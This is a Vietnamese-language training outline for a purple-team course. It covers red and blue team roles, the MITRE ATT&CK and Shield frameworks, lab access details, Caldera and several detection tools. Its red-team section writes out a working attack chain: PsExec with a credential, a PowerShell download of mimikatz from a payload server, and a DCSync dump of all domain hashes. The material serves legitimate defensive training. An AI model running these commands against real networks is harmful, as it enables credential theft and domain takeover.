PHÒNG THÍ NGHIỆM CHIẾN TRANH MẠNG: https://cyberwarfare.live PHÒNG THÍ NGHIỆM MÔ PHỎNG ĐỐI THỦ ĐỘI TÍM:

Đăng kí : Cyberwarfare – Purple Team Analyst [CPTA V1]

Tóm tắt:

1. Tài liệu này mô tả một khóa học về mô phỏng đối thủ và phát hiện tấn công trong môi trường doanh nghiệp mô phỏng.
2. Nó bao gồm các khái niệm về Đội tuyển Đỏ (tấn công), Đội tuyển Xanh (phòng thủ) và Đội tuyển Tím (kết hợp cả hai).
3. Khóa học sử dụng khung MITRE ATT&CK để mô phỏng các chiến thuật và kỹ thuật tấn công.
4. Học viên thực hành các kỹ năng tấn công và phòng thủ trong một môi trường thực tế mô phỏng.
5. Các công cụ như Caldera, ELK, Splunk, và ATA được sử dụng để mô phỏng tấn công và phát hiện.
6. Khóa học bao gồm nhiều giai đoạn của chuỗi tấn công, từ truy cập ban đầu đến rò rỉ dữ liệu.

Ví dụ áp dụng thực tế:

Một công ty công nghệ muốn cải thiện khả năng phòng thủ mạng của họ. Họ quyết định tổ chức một buổi diễn tập mô phỏng tấn công:

1. Đội Đỏ sử dụng Caldera để mô phỏng một cuộc tấn công APT, bắt đầu bằng một email lừa đảo gửi đến một nhân viên.
2. Họ khai thác một lỗ hổng trong hệ thống để có quyền truy cập ban đầu, sau đó sử dụng PowerShell để thực thi mã độc.
3. Đội Đỏ tiếp tục di chuyển ngang trong mạng, thu thập thông tin xác thực và tìm kiếm dữ liệu nhạy cảm.
4. Đội Xanh sử dụng ELK và Splunk để giám sát các hoạt động bất thường trên mạng.
5. Họ phát hiện các dấu hiệu của cuộc tấn công thông qua các cảnh báo về hoạt động PowerShell đáng ngờ và truy cập bất thường vào các tài nguyên quan trọng.
6. Đội Xanh thực hiện các biện pháp đối phó, chẳng hạn như cô lập các hệ thống bị ảnh hưởng và chặn các kết nối đáng ngờ.
7. Sau buổi diễn tập, cả hai đội cùng phân tích kết quả để xác định các điểm yếu trong hệ thống phòng thủ và đề xuất cải tiến.

Thông qua bài tập này, công ty có thể đánh giá hiệu quả của các biện pháp bảo mật hiện tại và xác định các lĩnh vực cần cải thiện, giúp tăng cường khả năng phòng thủ tổng thể của họ trước các mối đe dọa mạng trong thế giới thực.

NỘI DUNG ECOURSEWARE

1. Giới thiệu về Đội tuyển Tím: – 1.1 Về Đội tuyển Đỏ 1.2 Về Đội tuyển Xanh 1.3 Về Đội tuyển Tím
2. Tổng quan về Phòng thí nghiệm Mô phỏng Đối thủ Đội tuyển Xanh: – 2.1 Tổng quan về Phòng thí nghiệm 2.2 Kiến trúc Phòng thí nghiệm 2.3 Truy cập Phòng thí nghiệm 2.4 Về Môi trường Doanh nghiệp Mô phỏng 2.5 Mô phỏng Đối thủ 2.6 Phát hiện Đối thủ 2.7 Về Hoạt động Phối hợp Đội tuyển Đỏ và Xanh
3. Hoạt động Đội tuyển Đỏ trong Phòng thí nghiệm Mô phỏng 3.1 Mô phỏng Đối thủ Tự động 3.2 Mô phỏng Đối thủ Thủ công
4. Hoạt động Đội tuyển Xanh trong Phòng thí nghiệm Mô phỏng 4.1 Phát hiện tấn công dựa trên Máy chủ 4.2 Phát hiện tấn công dựa trên Mạng 4.3 Phát hiện tấn công dựa trên AD 4.4 Phân tích Lưu lượng Mạng 4.5 Điều tra Số và Ứng phó Sự cố
5. Bài tập Đội tuyển Tím (mô phỏng và phát hiện tấn công APT) 5.1 Mô phỏng Đối thủ Sử dụng Khung MITRE ATT&CK 5.2 Phát hiện Đối thủ sử dụng Khung MITRE Shield 5.3 Mô phỏng và Phát hiện Chiến thuật, Kỹ thuật và Thủ tục (TTP) 5.3.1 Môi trường Windows 5.3.2 Môi trường Linux
6. GIỚI THIỆU VỀ ĐỘI TUYỂN TÍM

1.1 VỀ ĐỘI TUYỂN ĐỎ

• Đội tuyển đỏ là một mô phỏng tấn công toàn diện, nhiều lớp được thiết kế để đo lường mức độ hiệu quả của con người, mạng, ứng dụng và kiểm soát bảo mật vật lý của bạn có thể chống lại một cuộc tấn công từ đối thủ thực tế.
• Vai trò của Đội tuyển Đỏ là bắt chước tác nhân đe dọa và cố gắng xâm nhập vào hệ thống.
• Họ đánh giá khả năng của tổ chức trong việc phát hiện, ứng phó và ngăn chặn các mối đe dọa có mục tiêu phức tạp.
• Họ bắt chước Chuỗi Giết hại của Đối thủ như được hiển thị bên dưới:
• Đội tuyển Đỏ sử dụng Công cụ Nguồn Mở và Nghiên cứu để không chỉ mô hình hóa mà còn thực hiện các chiến thuật trong thế giới thực liên quan đến chuỗi giết hại của đối thủ.
• Đội tuyển Đỏ có thể được gọi là mô phỏng đối thủ mô phỏng mối đe dọa, mô phỏng mối đe dọa, mô phỏng đối thủ, hoặc một số cụm từ khác thể hiện cách tiếp cận dựa trên mối đe dọa để kiểm tra môi trường.
• Các mối đe dọa được mô phỏng tăng cường trí nhớ cơ bắp của người phòng thủ và trang bị cho họ nhận thức tốt hơn về TTP của kẻ tấn công cũng như bài học từ thất bại được mô phỏng.

MỤC TIÊU CỦA ĐỘI TUYỂN ĐỎ

• Đào tạo hoặc đo lường khả năng của đội Hoạt động Bảo mật.
• Đo lường hiệu quả của con người, quy trình làm việc và công nghệ được sử dụng để bảo vệ mạng.
• Thử nghiệm và hiểu các Mối đe dọa hoặc kịch bản Đe dọa cụ thể và công nghệ của chúng.
• Đạt được một động cơ cụ thể: –
• Đánh cắp Dữ liệu
• Xâm phạm môi trường Mạng
• Xâm phạm một Ứng dụng
• Đạt được hiệu quả của các đội bảo mật.

1.2 VỀ ĐỘI TUYỂN XANH

• Nói một cách đơn giản, đội bảo mật bảo vệ chống lại các mối đe dọa và tấn công mạng.
• Họ tìm cách Phát hiện, Phòng thủ, bảo vệ và quan trọng nhất là tái nhóm cơ chế phòng thủ để làm cho Ứng phó sự cố mạnh mẽ hơn.
• Đội tuyển Xanh phải nhận thức về các TTP độc hại mới nhất để xây dựng các chiến lược ứng phó toàn diện.
• Đội tuyển Xanh sử dụng nhiều công cụ và phương pháp khác nhau làm biện pháp đối phó để bảo vệ mạng khỏi các Cuộc tấn công mạng.
• Các bài tập của Đội tuyển Xanh bao gồm: –
• Tiến hành phân tích dấu vết kỹ thuật số để theo dõi hoạt động của người dùng
• Triển khai giải pháp SIEM để ghi nhật ký và thu thập hoạt động mạng
• Phân tích nhật ký và bộ nhớ để phát hiện hoạt động bất thường trên hệ thống, và xác định và phát hiện một cuộc tấn công.
• Giám sát cấp Máy chủ và cấp Mạng
• Cài đặt và Bảo trì các giải pháp bảo mật điểm cuối trên các thiết bị
• Thực hiện kiểm tra DNS để ngăn chặn Tấn công Lừa đảo
• Phân tích dấu vết kỹ thuật số
• Phân tích dữ liệu tình báo rủi ro

MỤC TIÊU CỦA ĐỘI TUYỂN XANH

• Kết hợp các kỹ thuật Bảo mật Phòng thủ vào cơ sở hạ tầng của tổ chức.
• Phát hiện và Ngăn chặn Mối đe dọa Sớm
• Ngăn chặn tổ chức khỏi mất/rò rỉ dữ liệu
• Hiểu và xây dựng kế hoạch chống lại các lỗ hổng và thiếu sót được xác định bởi Đội tuyển Đỏ
• Hiển thị rõ hơn vào mạng.

1.3 VỀ ĐỘI TUYỂN TÍM

• Đội tuyển Tím kiểm tra khả năng của đội bảo mật tổ chức chống lại mọi giai đoạn của vòng đời tấn công.
• Nó là sự kết hợp của cả thành viên đội đỏ và đội xanh hiện có đến với nhau.
• Nó tồn tại để đảm bảo và tối đa hóa hiệu quả của các đội Đỏ và Xanh
• Mục tiêu chính của họ là cải thiện hiệu quả của việc phát hiện lỗ hổng, săn lùng mối đe dọa và giám sát mạng.
• Giúp củng cố và khám phá các phương pháp điều tra, giám sát mới.
• Tăng khả năng hiển thị vào mạng của tổ chức, và đảm bảo các lỗ hổng được xác định trước khi chúng trở thành vấn đề

MỤC TIÊU CỦA ĐỘI TUYỂN TÍM

• Tạo điều kiện cải thiện Phát hiện và Phòng thủ.
• Thiết lập điều chỉnh tốt hơn giữa Đội tuyển Đỏ và Đội tuyển Xanh.
• Nâng cao kỹ năng của cả hai đội.
• Theo dõi sự tiến bộ của khả năng phát hiện và ứng phó của đội bảo mật từ đầu đến cuối cuộc tấn công.
• Tăng khả năng hiển thị vào mạng của công ty, và đảm bảo các lỗ hổng được xác định trước khi chúng trở thành vấn đề.

2. TỔNG QUAN VỀ PHÒNG THÍ NGHIỆM MÔ PHỎNG ĐỐI THỦ ĐỘI TUYỂN XANH

2.1 TỔNG QUAN VỀ PHÒNG THÍ NGHIỆM

• Các Tác nhân Đe dọa Đỉnh cao có khả năng tiên tiến như tận dụng các cấy ghép trong bộ nhớ, sử dụng các lỗ hổng 0-day, di chuyển ngang với các Công cụ tùy chỉnh, sử dụng các cuộc tấn công cấp máy chủ như phun qua các quy trình để ẩn mình v.v. liên tục củng cố các kỹ thuật tấn công của họ (và Chiến thuật) chống lại các Đội Phòng thủ.
• Mục tiêu chính của phòng thí nghiệm là thực hiện các hoạt động đội tím. Về cơ bản, hoạt động đội tím là việc thực hiện các Chiến thuật, Kỹ thuật và Thủ tục (TTP) của một tác nhân đe dọa trên các hệ thống được giám sát với mục tiêu xác định và thu hẹp khoảng cách trong khả năng phát hiện.
• Trong Phòng thí nghiệm này, bạn sẽ chủ động làm việc với tư cách là thành viên Đội tuyển Tím, trong đó với tư cách là thành viên đội đỏ, bạn sẽ thực hiện các cuộc tấn công khác nhau và với tư cách là thành viên Đội tuyển Xanh, bạn sẽ Xác định, Phát hiện, Phân tích sau đó Ứng phó với những cuộc tấn công đó trong một môi trường doanh nghiệp thực tế.
• Mục đích chính của Phòng thí nghiệm này là giúp các thành viên Đội tuyển Xanh Xác định và Phát hiện các Kỹ thuật và Công cụ mới nhất được sử dụng bởi Đối thủ. Phân tích và Ứng phó với các cuộc tấn công đang diễn ra và thu thập bằng chứng cho mục đích điều tra. Tuy nhiên, các thành viên đội đỏ sẽ hiểu việc thực hiện các Hoạt động Đội đỏ ở chế độ ẩn mà không bị phát hiện và nhận thức về khả năng hiển thị đối với Đội tuyển Xanh.
• Điểm nổi bật Cấp cao của Phòng thí nghiệm:
• Bài tập Đội tuyển Tím (Đội tuyển Đỏ Vs Đội tuyển Xanh).
• Tấn công & Phòng thủ trong môi trường Doanh nghiệp mô phỏng.
• Hiểu và mô phỏng các Kỹ thuật Khung MITRE ATT&CK cho Đội tuyển Đỏ.
• Học và Phân tích trong khung Phòng thủ Chủ động MITRE.
• Thực hiện các cuộc tấn công mạng tự động cũng như thủ công.
• Xác định, Phát hiện, Giám sát …

Ứng phó với các cuộc tấn công mạng trong thời gian thực.

• Mô phỏng và Phát hiện TTP được sử dụng bởi các nhóm APT.
• Máy chủ Điều khiển & Chỉ huy (C2C) chuyên dụng cho Hoạt động Đội tuyển Đỏ.
• Học từ Góc độ Đội tuyển Xanh:
• Phát hiện & Phân tích các cuộc tấn công dựa trên Máy chủ khác nhau bằng các giải pháp giám sát điểm cuối.
• Phát hiện & Phân tích các cuộc tấn công dựa trên Mạng khác nhau bằng các giải pháp giám sát thiết bị mạng.
• Săn lùng các Mối đe dọa Mạng trong một môi trường doanh nghiệp thực tế.
• Thu thập bằng chứng và điều tra các cuộc tấn công mạng bằng các giải pháp DFIR.
• Phân tích Gói tin để hiểu các cuộc tấn công cấp Giao thức.
• Phát hiện các Cuộc tấn công dựa trên Kerberos nâng cao bằng giải pháp bảo mật của Microsoft.
• Giám sát Bảo mật Container theo thời gian thực.
• Thực hành trên các giải pháp SIEM khác nhau.
• Thực hiện Đánh giá Lỗ hổng cấp Hệ điều hành theo thời gian thực.
• Ánh xạ mọi cuộc tấn công vào Khung MITRE ATT&CK.
• Trực quan hóa Lưu lượng Mạng theo thời gian thực.
• Hiểu về các loại nhật ký khác nhau được tạo ra bởi các hệ thống Windows và Linux.
• Học từ Góc độ Đội tuyển Đỏ:
• Mô phỏng TTP của Kẻ tấn công trong môi trường thực tế.
• Hiểu về nhật ký, sự kiện và cảnh báo được tạo ra bởi các Công cụ Tấn công khác nhau.
• Xác định các Kỹ thuật mới nhất để vượt qua các giải pháp bảo mật khác nhau.
• Nâng cao kỹ năng Đội tuyển Đỏ ẩn bằng cách phân tích các hoạt động của Đội tuyển Xanh.
• Tạo cảnh báo theo thời gian thực bằng Khung Đội tuyển Đỏ Tự động (không cần kỹ năng đội đỏ).
• Tạo cảnh báo theo thời gian thực bằng cách thực hiện Hoạt động Đội tuyển Đỏ thủ công (yêu cầu kỹ năng đội đỏ).
• Vượt qua việc phát hiện các cuộc tấn công dựa trên Kerberos.

2.2 KIẾN TRÚC PHÒNG THÍ NGHIỆM [Hình ảnh minh họa kiến trúc phòng thí nghiệm]

2.3 TRUY CẬP PHÒNG THÍ NGHIỆM

• Học viên sẽ sử dụng VPN để truy cập cơ sở hạ tầng mô phỏng, dải VPN là:
• 192.168.150.x/24 trong đó x là số VPN của bạn.
• Các máy tấn công nơi bạn sẽ thực hiện các hoạt động tấn công nằm trong dải:
• Đội tuyển Đỏ Tự động
• Máy chủ C2 Caldera Chuyên dụng: http://192.168.250.1X:8888/
• Thông tin đăng nhập để truy cập Máy chủ C2:
• Tên người dùng: AdversaryX
• Mật khẩu: xxxxx
• Máy chủ Payload Chia sẻ: http://192.168.250.100
• Đội tuyển Đỏ Thủ công
• Dải Cơ sở hạ tầng Doanh nghiệp để mô phỏng tấn công là:
• 10.10.10.0/24 (có thể truy cập trực tiếp đến bạn)
• Máy Windows Truy cập Ban đầu (PS Remoting/PSEXEC): 10.10.10.5
• Máy Linux Truy cập Ban đầu (SSH): 10.10.10.6
• Thông tin đăng nhập để truy cập Máy Windows/Linux Truy cập Ban đầu:
• Tên người dùng: cyberwarfare\empX
• Mật khẩu: xxxxx
• Các Công cụ Phòng thủ cho hoạt động Đội tuyển Xanh nằm trong dải: – Máy Địa chỉ IP Giám sát Tấn công dựa trên Mạng [SPLUNK] http://172.16.1.12:8000 Giám sát Tấn công dựa trên Máy chủ [ELK] https://172.16.1.13/app/wazuh Điều tra Số & Ứng phó Sự cố [DFIR] http://172.16.1.14:8000 Phân tích Lưu lượng Mạng http://172.16.1.15:8005 ATA-CENTER https://172.16.1.11 Thông tin đăng nhập để Truy cập tất cả các giải pháp trong Môi trường Đội tuyển Xanh: – Tên người dùng: analystX Mật khẩu: xxxxx

2.4 VỀ MÔI TRƯỜNG DOANH NGHIỆP MÔ PHỎNG Môi trường Doanh nghiệp mô phỏng cho phép các thành viên Đội tuyển Đỏ thực hiện những điều sau: –

• Mô phỏng tấn công Đội tuyển Đỏ trong Môi trường Active Directory được cấu hình sai
• Vượt qua Kiểm soát Bảo mật dựa trên Máy chủ & Mạng
• Khai thác kết hợp các máy Linux & Windows
• Khai thác Máy chủ MSSQL
• Các lỗ hổng và cấu hình sai dựa trên Web và Mạng
• Mô phỏng Người dùng
• Nhiều Kịch bản Di chuyển Ngang và Chuyển hướng
• Nâng cao Đặc quyền Ngang và Dọc
• Các cuộc tấn công và khai thác dựa trên Kerberos

2.5 MÔ PHỎNG ĐỐI THỦ 1 Về Mô phỏng Đối thủ

• Đây là một loại hoạt động đội đỏ bắt chước một mối đe dọa đã biết đối với một tổ chức bằng cách kết hợp thông tin tình báo về mối đe dọa để xác định những hành động và hành vi mà đội đỏ sử dụng.
• Những người mô phỏng đối thủ xây dựng một kịch bản để kiểm tra các khía cạnh nhất định của chiến thuật, kỹ thuật, và thủ tục (TTP) của đối thủ.
• Sau đó đội đỏ tuân theo kịch bản trong khi hoạt động trên một mạng mục tiêu để kiểm tra cách phòng thủ có thể chống lại đối thủ được mô phỏng như thế nào.
• Mô phỏng các TTP của các nhóm tác nhân đe dọa khác nhau bằng cách tuân theo Khung MITRE ATT&CK.

2 Về Khung MITRE ATT&CK

• Khung MITRE ATT&CK là một ma trận toàn diện về các chiến thuật và kỹ thuật được sử dụng bởi các thợ săn mối đe dọa, thành viên đội đỏ và người phòng thủ để phân loại tốt hơn các cuộc tấn công và đánh giá rủi ro của một tổ chức.
• Mục đích của khung là cải thiện việc phát hiện đối thủ sau khi xâm nhập trong các doanh nghiệp bằng cách minh họa các hành động mà kẻ tấn công có thể đã thực hiện.

3 Về Chiến thuật, Kỹ thuật và Thủ tục (TTP) A) Chiến thuật: Chiến thuật đề cập đến mô tả cấp cao về hành vi, tác nhân đe dọa đang cố gắng hoàn thành. Có tổng cộng 11 chiến thuật trong Khung MITRE ATT&CK. B) Kỹ thuật: Các hàng trong ma trận MITRE ATT&CK là các kỹ thuật được sử dụng để thực hiện hành động cho một chiến thuật cụ thể. Nói chung, một kỹ thuật đại diện cho cách tác nhân đe dọa đạt được mục tiêu chiến thuật. C) Thủ tục: Thủ tục là một trường hợp sử dụng cụ thể và có thể rất hữu ích để hiểu chính xác cách kỹ thuật được sử dụng và để tạo lại một sự cố với mô phỏng đối thủ và để biết chi tiết về cách phát hiện trường hợp đó đang được sử dụng.

ID Chiến thuật Tên Chiến thuật Mô tả Chiến thuật TA0001 Truy cập Ban đầu Đối thủ đang cố gắng xâm nhập vào mạng của bạn. TA0002 Thực thi Đối thủ đang cố gắng chạy mã độc. TA0003 Duy trì Đối thủ đang cố gắng duy trì vị trí của họ. TA0004 Nâng cao Đặc quyền Đối thủ đang cố gắng có được quyền cấp cao hơn. TA0005 Trốn tránh Phòng thủ Đối thủ đang cố gắng tránh bị phát hiện. TA0006 Truy cập Thông tin xác thực Đối thủ đang cố gắng đánh cắp tên tài khoản và mật khẩu. TA0007 Khám phá Đối thủ đang cố gắng tìm hiểu môi trường của bạn. TA0008 Di chuyển Ngang Đối thủ đang cố gắng di chuyển qua môi trường của bạn. TA0009 Thu thập Đối thủ đang cố gắng thu thập dữ liệu quan tâm đến mục tiêu của họ. TA0011 Điều khiển và Chỉ huy Đối thủ đang cố gắng giao tiếp với các hệ thống bị xâm phạm để kiểm soát chúng. TA0010 Rò rỉ Đối thủ đang cố gắng đánh cắp dữ liệu. TA0040 Tác động Đối thủ đang cố gắng thao túng, gián đoạn hoặc phá hủy hệ thống và dữ liệu của bạn.

4. Cách thực hiện Mô phỏng Đối thủ A) Mô phỏng Tấn công Tự động: Thực hiện các cuộc tấn công và mô phỏng TTP của tác nhân đe dọa bằng Bộ công cụ Đội tuyển Đỏ Tự động MITRE Caldera. B) Mô phỏng Tấn công Thủ công: Thực hiện các cuộc tấn công và mô phỏng TTP của tác nhân đe dọa với hoặc không có Máy chủ Điều khiển & Chỉ huy. Nó tương tự như thực hiện Hoạt động Đội tuyển Đỏ thủ công chống lại Môi trường Doanh nghiệp.

2.6 PHÁT HIỆN ĐỐI THỦ 1 Về Phát hiện Đối thủ

• Xác định các Tác nhân Đe dọa tinh vi hoạt động trong môi trường doanh nghiệp.
• Một cách tiếp cận chủ động để phát hiện sử dụng cả Dấu hiệu Tấn công (IOA) và Dấu hiệu Xâm nhập (IOC) để phát hiện các sự cố hoặc mối đe dọa bảo mật càng gần thời gian thực càng tốt
• Giám sát, Phát hiện và Xác định các cuộc tấn công của đối thủ và ứng phó để ngăn chặn các cuộc tấn công như vậy theo thời gian thực.

2.6 PHÁT HIỆN ĐỐI THỦ 2 Về Khung Phòng thủ Chủ động MITRE ‘Shield’

• MITRE Shield là một cơ sở kiến thức công khai, miễn phí về các kỹ thuật
• và chiến thuật phổ biến có thể giúp các chuyên gia thực hiện các bước chủ động để bảo vệ mạng và tài sản của họ
• Nó xác định các cơ hội học tập mà những người phòng thủ có được từ việc chủ động tiếp nhận và tương tác với kẻ xâm nhập trên mạng.
• Ví dụ, bằng cách tạo một tài khoản mồi nhử, một tổ chức có thể dụ kẻ đối địch thực hiện một số hành động có thể tiết lộ thông tin về chiến thuật và công cụ của họ.
• Ví dụ, một hệ thống mục tiêu với thông tin xác thực mồi nhử – như tên người dùng, mật khẩu và mã thông báo trình duyệt giả – người phòng thủ có thể nhận được cảnh báo khi kẻ đối địch truy cập một tài nguyên cụ thể hoặc sử dụng một kỹ thuật cụ thể
• MITRE đã ánh xạ hành vi của kẻ đối địch sau khi xâm nhập trong khung ATT&CK của nó với các kỹ thuật phòng thủ liên quan trong Shield.

3 Chiến thuật Phòng thủ Chủ động:

ID Tên Mô tả DTA0001 Kênh Hướng kẻ đối địch đi theo một đường dẫn cụ thể hoặc theo một hướng cụ thể. DTA0002 Thu thập Thu thập công cụ của kẻ đối địch, quan sát chiến thuật và thu thập thông tin tình báo thô khác về hoạt động của kẻ đối địch. DTA0003 Chứa Ngăn chặn kẻ đối địch di chuyển ra ngoài các ranh giới hoặc ràng buộc cụ thể. DTA0004 Phát hiện Thiết lập hoặc duy trì nhận thức về những gì kẻ đối địch đang làm. DTA0005 Phá vỡ Ngăn chặn kẻ đối địch thực hiện một phần hoặc toàn bộ nhiệm vụ của họ. DTA0006 Tạo điều kiện Cho phép kẻ đối địch thực hiện một phần hoặc toàn bộ nhiệm vụ của họ. DTA0007 Hợp pháp hóa Thêm tính xác thực vào các thành phần lừa đảo để thuyết phục kẻ đối địch rằng thứ gì đó là thật. DTA0008 Kiểm tra Xác định mối quan tâm, khả năng hoặc hành vi của kẻ đối địch.

4 Các giải pháp bảo mật để Giám sát, Phát hiện, Xác định & Ứng phó với Tấn công mạng A. Splunk & Suricata (NIDS) – Giám sát Tấn công Dựa trên Mạng B. ELK & Wazuh (HIDS) – Giám sát Tấn công Dựa trên Máy chủ / Điểm cuối C. Advance Threat Analytics (ATA) – Phát hiện Tấn công Dựa trên AD & Kerberos D. Network Traffic Analyst – Phân tích Giao thức Mạng Độc hại E. Google Rapid Response (GRR) – Điều tra Số & Ứng phó Sự cố

2.7 VỀ HOẠT ĐỘNG PHỐI HỢP ĐỘI TUYỂN ĐỎ vs XANH [Hình ảnh minh họa]

3. HOẠT ĐỘNG ĐỘI TUYỂN ĐỎ TRONG PHÒNG THÍ NGHIỆM MÔ PHỎNG

3.1 HOẠT ĐỘNG ĐỘI TUYỂN ĐỎ TRONG PHÒNG THÍ NGHIỆM MÔ PHỎNG

1. Mô phỏng Đối thủ Tự động

• Giới thiệu về Caldera
• Đây là một khung mô phỏng đối thủ được thiết kế để dễ dàng chạy các bài tập mô phỏng xâm nhập & tự động.
• Nó được xây dựng trên khung MITRE ATT&CK™
• Chủ động tấn công các hệ thống mục tiêu bằng cách triển khai các backdoor tùy chỉnh (theo mô hình máy khách, máy chủ)
• CALDERA hoạt động bằng cách gắn các khả năng vào một đối thủ và chạy đối thủ đó trong một hoạt động.

KIẾN TRÚC CALDERA:

1. Máy chủ và Agent được viết bằng Python 3
2. RAT được viết bằng C#
3. MongoDB
4. Giao diện web là một ứng dụng web dựa trên JavaScript
5. Backend logic pyDatalog

1. Truy cập Ban đầu: PsExec trên Employee-Machine
2. Tải xuống Mimikatz từ Máy chủ Payload
3. Thực hiện TẤN CÔNG DCSYNC trên Bộ điều khiển Miền Kẻ tấn công nhắm mục tiêu Employee-Machine

2 Đoạn mã Mô phỏng Tấn công Thủ công – a. Thực hiện “PsExec” chống lại máy window mục tiêu với thông tin xác thực hợp lệ để truy cập ban đầu – PsExec64.exe \10.10.10.5 -u cyberwarfare\priv -p Dcsync@086 -h cmd.exe b. Tải xuống tệp nhị phân “Mimikatz” từ máy chủ payload trên máy bị xâm phạm – powershell.exe Invoke-WebRequest http://192.168.250.100/mimikatz.exe -OutFile C:\Users\Public\mimikatz.exe c. Chạy Tấn công “DCSync” chống lại bộ điều khiển miền bằng mimikatz đã tải xuống – C:\Users\Public\mimikatz.exe “lsadump::dcsync /domain:cyberwarfare.corp /all /csv”

4. HOẠT ĐỘNG ĐỘI TUYỂN XANH TRONG MÔI TRƯỜNG MÔ PHỎNG

Phát hiện Tấn công Dựa trên AD & Kerberos (ATA) Giám sát & Phát hiện tấn công dựa trên Máy chủ Giám sát & Phát hiện tấn công dựa trên Mạng Điều tra Số & Ứng phó Sự cố Phát hiện Lưu lượng Mạng Độc hại (phân tích PCAP) B. Phát hiện hoạt động Thực thi PowerShell trên Employee-Machine A. Phát hiện Tấn công DCSync trên Bộ điều khiển Miền bằng ATA E. Thu thập bằng chứng từ máy bị xâm phạm D. Phát hiện & Phân tích Tấn công PSEXEC Sử dụng NIDS C. Phân tích địa chỉ IP Máy chủ Payload độc hại

• Phát hiện Tấn công Dựa trên Active Directory & Kerberos bằng ATA:
• Microsoft Advanced Threat Analytics (ATA) là một nền tảng tại chỗ giúp bảo vệ chống lại nhiều cuộc tấn công mạng có mục tiêu hoặc mối đe dọa nội bộ.
• ATA thu thập thông tin từ nhiều nguồn dữ liệu, nhật ký và sự kiện trong môi trường mạng, một số thiết bị là: –
• Giải pháp SIEM
• Chuyển tiếp Sự kiện Windows
• Gateway Nhẹ (Triển khai trong Bộ điều khiển Miền)
• Có khả năng phát hiện các cuộc tấn công khác nhau như, PTT, PTH, O-PTH, Golden Ticket, Thực thi lệnh từ xa, Tấn công Brute Force, v.v.
• Phát hiện Tấn công Dựa trên Máy chủ bằng HIDS:
• Hệ thống phát hiện xâm nhập dựa trên máy chủ (HIDS) là một hệ thống phát hiện xâm nhập có khả năng giám sát và phân tích nội bộ của một hệ thống máy tính.
• Giám sát và Phát hiện các mối đe dọa hoạt động từ các điểm cuối có trong môi trường doanh nghiệp.
• Thu thập nhật ký từ các thiết bị điểm cuối bằng tác nhân Máy chủ (HIDS).
• Các cuộc tấn công cấp máy chủ khác nhau như nâng cao đặc quyền, truy vấn độc hại, v.v. có thể được phát hiện bởi HIDS.
• Loại nhật ký được thu thập từ các nền tảng khác nhau:
• Nền tảng Windows – Nhật ký hệ thống, Nhật ký bảo mật, Nhật ký Sysmon, Nhật ký Powershell, v.v. o Vị trí tệp nhật ký bản ghi PowerShell: “C:” – (Truy cập tệp nhật ký này bằng tiện ích GRR)
• Nền tảng Linux – Nhật ký Auditd, Nhật ký xác thực, Nhật ký công việc Cron, syslog, v.v.
• Phân tích Lưu lượng Mạng
• Giám sát và phát hiện liên tục lưu lượng mạng, kết nối mạng từ các địa chỉ IP đáng ngờ.
• Đây là quá trình chặn, ghi lại và phân tích các mẫu giao tiếp lưu lượng mạng để phát hiện và ứng phó với các mối đe dọa bảo mật.
• Hành động bằng phân tích mạng:
• Khả năng hiển thị rộng hơn cho Mạng
• Phân tích Lưu lượng Mã hóa
• Phân tích cấp Giao thức
• Phân tích lưu lượng máy chủ c2 độc hại
• Phát hiện Tấn công Dựa trên Mạng bằng NIDS:
• Hệ thống phát hiện xâm nhập dựa trên mạng (NIDS) phát hiện lưu lượng độc hại trên một mạng.
• Phát hiện Tấn công ở tất cả các lớp của mô hình TCP/IP để ngăn chặn và giảm thiểu chống lại các mối đe dọa hoạt động và chặn lưu lượng độc hại ở cấp mạng.
• Trong giám sát tấn công dựa trên mạng, nó thu thập nhật ký từ các thiết bị mạng khác nhau:
• IDS / IPS
• Tường lửa
• Bộ định tuyến
• Switch
• Điều tra Số và Ứng phó Sự cố bằng GRR & OSQUERY:
• Google Rapid Response (GRR) là một công cụ pháp y trực tiếp nguồn mở được tạo bởi Google cho ứng phó sự cố.
• Mục tiêu của GRR là hỗ trợ trong điều tra pháp y trực tiếp và điều tra để cho phép phân tích từ xa cho phép các nhà điều tra thu thập dữ liệu về các hệ thống đang chạy trên một mạng, từ một hệ thống đến hàng nghìn hệ thống.
• Osquery hiển thị một hệ điều hành dưới dạng cơ sở dữ liệu quan hệ hiệu suất cao. Điều này cho phép bạn viết các truy vấn SQL để khám phá dữ liệu hệ điều hành.
• Với osquery, các bảng SQL đại diện cho các khái niệm trừu tượng như các quy trình đang chạy, các mô-đun kernel đã tải, kết nối mạng mở, plugin trình duyệt, sự kiện phần cứng hoặc băm tệp.
• Tải xuống các tệp nhật ký bản ghi PowerShell từ máy windows bằng GRR.

5. Bài tập Đội tuyển Tím (Mô phỏng và Phát hiện Tấn công APT)

5.1 Bài tập Đội tuyển Tím (Mô phỏng & Phát hiện Tấn công APT) TRUY CẬP BAN ĐẦU THỰC THI DUY TRÌ NÂNG CAO ĐẶC QUYỀN TRỐN TRÁNH PHÒNG THỦ TRUY CẬP THÔNG TIN XÁC THỰC KHÁM PHÁ DI CHUYỂN NGANG THU THẬP ĐIỀU KHIỂN & CHỈ HUY RÒ RỈ

WINDOWS T1133 T1059

ST: 001 T1547 ST: 001 T1543 ST:003 T1222 ST: 001 T1003 ST:001 T1482 T1550 ST: 002 T1005 T1071 ST: 001 T1048 ST:003

LINUX T1133 T1059 ST: 004 T1136 ST: 001 T1548 ST:003 T1222 ST:002 T1003 ST:008 T1046 T1021 ST: 004 T1005 T1071 ST: 001 T1041

NỀN TẢNG CHIẾN THUẬT

T -> Kỹ thuật ST -> Kỹ thuật phụ

TTP được thực hiện/bao gồm trong nền tảng WINDOWS

CHIẾN THUẬT ID Kỹ thuật Tên Kỹ thuật Tên Kỹ thuật phụ Truy cập Ban đầu T1133 Dịch vụ Từ xa Bên ngoài N/A Thực thi T1059 / ST: 001 Thông dịch Lệnh và Kịch bản PowerShell Duy trì T1547 / ST: 001 Thực thi Tự động Khởi động hoặc Đăng nhập Khóa Đăng ký Chạy / Thư mục Khởi động Nâng cao Đặc quyền T1543 / ST:003 Tạo hoặc Sửa đổi Quy trình Hệ thống Dịch vụ Windows Trốn tránh Phòng thủ T1222 / ST: 001 Sửa đổi Quyền Tệp & Thư mục Sửa đổi Quyền Tệp & Thư mục Windows Truy cập Thông tin xác thực T1003 / ST:001 Dump Thông tin xác thực HĐH Bộ nhớ LSASS Khám phá T1482 Khám phá Tin cậy Miền N/A Di chuyển Ngang T1550 / ST: 002 Sử dụng Tài liệu Xác thực Thay thế Pass the Hash Thu thập T1005 Dữ liệu từ Hệ thống Cục bộ N/A Điều khiển và Chỉ huy T1071 / ST: 001 Giao thức Lớp Ứng dụng Giao thức 